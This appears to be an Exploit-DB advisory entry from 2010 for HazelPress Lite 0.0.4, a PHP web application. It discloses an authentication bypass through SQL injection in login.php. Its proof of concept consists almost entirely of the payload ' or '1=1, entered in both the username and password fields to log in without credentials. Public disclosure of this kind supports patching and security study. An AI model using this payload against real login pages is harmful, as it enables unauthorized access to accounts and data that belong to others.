HazelPress Lite 0.0.4 - Authentication Bypass

EDB-ID:

11602


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2010-02-28


# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1